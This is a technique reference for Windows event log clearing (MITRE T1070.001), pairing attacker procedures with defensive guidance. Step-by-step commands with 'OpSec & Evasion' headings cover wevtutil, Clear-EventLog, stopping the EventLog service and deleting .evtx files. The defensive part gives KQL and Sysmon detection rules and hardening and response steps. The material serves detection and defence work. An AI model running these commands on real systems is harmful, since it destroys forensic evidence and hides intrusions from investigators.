| Attribute | Details |
|---|---|
| Technique ID | EVADE-IMPAIR-004 |
| MITRE ATT&CK v18.1 | T1070.001 - Clear Windows Event Logs |
| Tactic | Defense Evasion |
| Platforms | Windows Endpoint |
| Severity | Critical |
| CVE | N/A |
| Technique Status | ACTIVE (detection highly reliable; prevention via remote log forwarding) |
| Last Verified | 2025-01-09 |
| Affected Versions | Windows 10/11 (all), Server 2016-2025 |
| Patched In | Remote event forwarding to SIEM; Volume Shadow Copy (VSS) retention; Tamper protection on logs |
| Author | SERVTEP – Artur Pchelnikau |
Concept: Windows Event Logs (Security, System, Application) record all user and system activity including login attempts, process creation, privilege escalation, and malware execution. Clearing these logs is a post-compromise cleanup technique that destroys forensic evidence of the entire attack. Methods include using wevtutil, PowerShell Clear-EventLog, or direct file deletion from C:\Windows\System32\winevt\logs\. Event log clearing generates its own suspicious indicator (EventID 1102: “The audit log was cleared”), making it highly detectable but effective for destroying evidence when time permits.
Attack Surface: Event Log service, event log files (.evtx) stored on disk, registry entries for log configuration, and the Event Viewer management interface.
Business Impact: Destruction of Forensic Evidence. Clearing event logs prevents security teams from investigating the attack timeline, identifying lateral movement paths, discovering other compromised accounts, or determining what data was accessed. Organizations lose the ability to answer critical incident response questions: “What happened?” and “How long was the attacker present?”
Technical Context: Clearing a log is typically the final step in a post-compromise cleanup chain. By this time, attackers have already achieved their objectives (data exfiltration, persistence, lateral movement). The log clearing attempt is often the first indicator of compromise if logs are being remotely forwarded. Modern EDR and SIEM tools detect the clearing attempt (EventID 1102) and generate critical alerts.
| Framework | Control / ID | Description |
|---|---|---|
| CIS Benchmark | 6.1, 6.2 | Protect event logs; ensure audit logging is enabled and protected. |
| DISA STIG | WN10-AU-000025, WN10-AU-000030 | Protect and audit event log retention and integrity. |
| CISA SCuBA | SC.L1.1 | Detect and respond; maintain audit trail integrity. |
| NIST 800-53 | AU-2 (Audit Events), AU-12 (Audit Generation), SI-4 (Monitoring) | Generate and protect audit records; detect suspicious activity. |
| GDPR | Art. 32, 33, 5(1)(f) | Integrity and confidentiality of personal data; accountability. |
| DORA | Art. 18, 19 | Incident reporting; breach notification. |
| NIS2 | Art. 21, 22 | Detection capabilities; Incident management. |
| ISO 27001 | A.12.4.1, A.12.4.3 | Event logging; Protection of log information. |
| ISO 27005 | Risk Scenario | Destruction of audit evidence; Non-repudiation loss. |
Supported Versions:
# Check event log sizes
Get-WinEvent -ListLog * | Select-Object LogName, RecordCount, FileSize
# Check Security log event count
(Get-WinEvent -LogName Security -MaxEvents 1).RecordCount
# Check if Event Log service is running
Get-Service EventLog | Select-Object Status, StartType
# Check if remote log forwarding is configured
Get-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager" -ErrorAction SilentlyContinue
# Check VSS (Volume Shadow Copy) for backup copies of logs
vssadmin list shadows /for=C:\
What to Look For:
Stopped, logs are not being recorded; if Running, logs are active.Supported Versions: Windows 10/11, Server 2016-2025
Objective: Use wevtutil to clear a specific event log (Security, System, or Application).
Command (Command Prompt or PowerShell):
# Clear Security Event Log
wevtutil cl security
# Clear System Event Log
wevtutil cl system
# Clear Application Event Log
wevtutil cl application
Expected Output:
(No output on success)
What This Means:
OpSec & Evasion:
Troubleshooting:
References:
Objective: Clear all event logs in one command (more suspicious, but more thorough evidence destruction).
Command (PowerShell - Admin Required):
# Clear all event logs
foreach ($log in (Get-WinEvent -ListLog *).LogName) {
Clear-EventLog -LogName $log -Confirm:$false -ErrorAction SilentlyContinue
}
Expected Output:
(No output; all logs cleared)
What This Means:
OpSec & Evasion:
Troubleshooting:
Supported Versions: Windows 10/11, Server 2016-2025
Objective: Use native PowerShell cmdlet to clear event logs.
Command (PowerShell - Admin Required):
# Clear Security log
Clear-EventLog -LogName Security -Confirm:$false
# Clear System log
Clear-EventLog -LogName System -Confirm:$false
# Clear Application log
Clear-EventLog -LogName Application -Confirm:$false
Expected Output:
(No output on success)
What This Means:
OpSec & Evasion:
Troubleshooting:
Get-WinEvent -ListLog * to list all available logs.References:
Supported Versions: Windows 10/11, Server 2016-2025
Objective: Stop the Event Log service so log files can be deleted.
Command (Command Prompt - Admin Required):
# Stop the Event Log service
net stop EventLog
# Alternative using sc.exe
sc stop EventLog
Expected Output:
The Event Log service is stopping.
The Event Log service has stopped successfully.
What This Means:
OpSec & Evasion:
Troubleshooting:
taskkill /f /im svchost.exe (dangerous; may crash system).Objective: Delete the physical .evtx files from disk.
Command (Command Prompt - Admin Required):
# Delete event log files
del "C:\Windows\System32\winevt\logs\Security.evtx"
del "C:\Windows\System32\winevt\logs\System.evtx"
del "C:\Windows\System32\winevt\logs\Application.evtx"
# Delete PowerShell logs
del "C:\Windows\System32\winevt\logs\Microsoft-Windows-PowerShell*Operational.evtx"
Expected Output:
(No output on success; files deleted)
What This Means:
OpSec & Evasion:
Troubleshooting:
Objective: Restart Event Log service so system continues logging (covering tracks).
Command (Command Prompt):
# Start the Event Log service
net start EventLog
# Alternative using sc.exe
sc start EventLog
Expected Output:
The Event Log service is starting.
The Event Log service has started successfully.
What This Means:
Supported Versions: All Windows versions
Objective: Use GUI to clear event logs interactively (leaves GUI interaction artifacts in process logs).
Steps:
eventvwr.msc, press EnterWhat This Means:
OpSec & Evasion:
Test ID: T1070.001 (Event Log Clearing variants)
Supported Tests:
Invoke-AtomicTest T1070.001 -TestNumbers 1
Invoke-AtomicTest T1070.001 -TestNumbers 1 -Cleanup
Invoke-AtomicTest T1070.001 -TestNumbers 2
Invoke-AtomicTest T1070.001 -TestNumbers 3
Reference: Atomic Red Team Library - T1070.001
Version: All Windows versions Purpose: Command-line event log management. Usage:
wevtutil cl security
wevtutil cl system
wevtutil cl application
References:
Version: PowerShell 5.0+ Purpose: PowerShell cmdlet for clearing event logs. Usage:
Clear-EventLog -LogName Security -Confirm:$false
References:
Version: All Windows versions
Purpose: GUI for event log management.
Usage: eventvwr.msc (Right-click log → Clear Log)
Rule Configuration:
KQL Query:
// Detect clearing of event logs (EventID 1102)
SecurityEvent
| where EventID == 1102
| project TimeGenerated, Computer, SubjectUserName, EventID, Activity, Message
| summarize ClearCount = count() by Computer, SubjectUserName, bin(TimeGenerated, 5m)
| where ClearCount > 0
| sort by TimeGenerated desc
What This Detects:
Manual Configuration (Azure Portal):
Suspicious Event Log ClearingCritical1 minuteCount > 0Rule Configuration:
KQL Query:
// Detect stopping of Event Log service
SecurityEvent
| where EventID in (7034, 7035) // Service crashed/stopped
| where SubjectUserName contains "EventLog"
| project TimeGenerated, Computer, EventID, Activity, SubjectUserName
What This Detects:
Event ID: 1102 (Audit Log Cleared)
Manual Configuration (Audit Clearing):
auditpol /set /subcategory:"Security System Extension" /success:enable /failure:enable
Event ID: 4688 (Process Creation)
Manual Configuration:
gpupdate /forceEvent ID: 7034 / 7035 (Service Events)
Minimum Sysmon Version: 11.0+
<Rule name="Event Log Clearing via wevtutil" groupRelation="or">
<ProcessCreate onmatch="all">
<Image condition="endswith">wevtutil.exe</Image>
<CommandLine condition="contains">cl</CommandLine>
</ProcessCreate>
</Rule>
<Rule name="Event Log Clearing via PowerShell" groupRelation="or">
<ProcessCreate onmatch="all">
<Image condition="contains">powershell.exe</Image>
<CommandLine condition="contains">Clear-EventLog</CommandLine>
</ProcessCreate>
</Rule>
<Rule name="Event Log Service Stopped" groupRelation="or">
<ProcessCreate onmatch="all">
<Image condition="endswith">sc.exe</Image>
<CommandLine condition="contains all">stop; EventLog</CommandLine>
</ProcessCreate>
</Rule>
<Rule name="Suspicious Event Log File Deletion" groupRelation="or">
<FileDelete onmatch="all">
<TargetFilename condition="contains">\winevt\logs\</TargetFilename>
<TargetFilename condition="endswith">.evtx</TargetFilename>
</FileDelete>
</Rule>
Manual Configuration:
sysmon-config.xml with XML abovesysmon64.exe -accepteula -i sysmon-config.xml
Alert Name: “Suspicious Activity - Event Log Cleared”
Manual Configuration:
1. Implement Centralized Remote Event Log Forwarding
Manual Steps (Group Policy - Windows Event Collector):
Server=https://your-siem-server:5985/wsman/SubscriptionManager/WEC,Refresh=60
gpupdate /forceManual Steps (PowerShell - Configure Forwarder):
# On domain-joined machines, create event subscription
New-EventLogSubscription -CollectorName YourCollector -SourceComputer "Domain Computers" -LogPath "Forwarded Events"
2. Restrict Permissions on Event Log Files
Manual Steps (NTFS Permissions):
# Restrict access to event log directory
icacls "C:\Windows\System32\winevt\logs" /grant:r "BUILTIN\Administrators:F" /inheritance:r
icacls "C:\Windows\System32\winevt\logs" /grant:r "SYSTEM:F" /inheritance:r
icacls "C:\Windows\System32\winevt\logs" /grant:r "NETWORK SERVICE:R" /inheritance:r
icacls "C:\Windows\System32\winevt\logs" /grant:r "LOCAL SERVICE:R" /inheritance:r
3. Enable Volume Shadow Copy (VSS) for Log Recovery
Manual Steps (Configure VSS Schedule):
vssadmin list shadows /for=C:\
4. Implement Audit Logging for Event Log Access
Manual Steps (Group Policy - Audit Object Access):
icacls "C:\Windows\System32\winevt\logs" /setaudit "Everyone:(OA;CI;WA;;;S-1-1-0)"
gpupdate /force5. Deploy EDR with Real-Time Monitoring
Manual Steps (Enable MDE):
6. Restrict Administrative Access
wevtutil.exe for non-admin groups# Check event log forwarding configuration
Get-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager"
# Check NTFS permissions on event log directory
icacls "C:\Windows\System32\winevt\logs"
# Check VSS snapshots
vssadmin list shadows /for=C:\
# Verify Event Log service is running and protected
Get-Service EventLog | Select-Object Status, StartType
Expected Output (If Secure):
Server=https://your-siem:5985/wsman/SubscriptionManager/WEC,Refresh=60
(NTFS permissions restricted)
(VSS snapshots present)
Status : Running
StartType : Automatic
wevtutil.exe, powershell.exe, sc.exe with event log clearing parameters.evtx files in C:\Windows\System32\winevt\logs\Disable-NetAdapter -Name "Ethernet" -Confirm:$false
# Recover from VSS
vssadmin list shadows /for=C:\
# Use forensic tools to recover from shadow copy
# Capture process memory
procdump64.exe -ma powershell.exe C:\Evidence\powershell.dmp
# Export registry for audit trail
reg export HKLM C:\Evidence\HKLM.reg
# Restart Event Log service (recreates logs)
Restart-Service -Name EventLog -Force
# Re-enable event logging via Group Policy
gpupdate /force
| Step | Phase | Technique | Description |
|---|---|---|---|
| 1 | Reconnaissance | [REC-AD-001] Tenant Discovery | Attacker gathers info on target. |
| 2 | Execution | [CA-DUMP-001] Mimikatz | Attacker dumping credentials (logged in Security log). |
| 3 | Persistence | [PERSIST-001] Registry Run Key | Attacker creates persistence (logged in System log). |
| 4 | Defense Evasion | [EVADE-IMPAIR-004] | Attacker clears event logs (EventID 1102 generated, then Security log cleared). |
| 5 | Impact | [DATA-EXF-001] Data Exfiltration | Attacker exfils data; no forensic evidence of earlier steps. |
wevtutil cl System and wevtutil cl Security to clear event logs after lateral movement.wevtutil to clear event logs as part of post-compromise cleanup before deploying destructive wiper malware.